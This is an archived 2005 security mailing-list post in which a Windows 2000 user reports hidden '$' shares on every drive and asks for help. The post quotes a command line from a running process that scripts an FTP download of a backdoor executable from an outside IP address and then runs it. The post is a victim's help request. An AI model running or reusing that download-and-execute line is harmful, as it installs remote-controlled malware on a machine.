Re: Win2k Backdoor!

From: Cactus (zhanglihome)
Date: 08/10/05

• Next message: Patty Calcaterra: "AD Security Patch"
• Previous message: Cactus: "Win2k BackDoom!"
• In reply to: Cactus: "Win2k BackDoom!"
• Next in thread: Steven L Umbach: "Re: Win2k BackDoom!"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: Wed, 10 Aug 2005 13:58:27 +0800

> I don't know what is happen.
>
> even time I start win2k.
> all harddisk was shared!
>
> and its shared name end by "$".
> so the shared Icon without display.
>

I checking process find this.

cmd /k echo open 219.131.5.180 32845 > o&echo user 1 1 >> o &echo get
msgame32.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &msgame32.exe

anti-virus software say the [msgame32.exe] is a backdoor program.

the attack again and again. I no idea who start the process?

• Next message: Patty Calcaterra: "AD Security Patch"
• Previous message: Cactus: "Win2k BackDoom!"
• In reply to: Cactus: "Win2k BackDoom!"
• Next in thread: Steven L Umbach: "Re: Win2k BackDoom!"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

• Security
• UNIX
• Linux
• Coding
• Usenet

• News
• Mailing-Lists
• Newsgroups
• Service
• About
• Privacy
• Search
• Imprint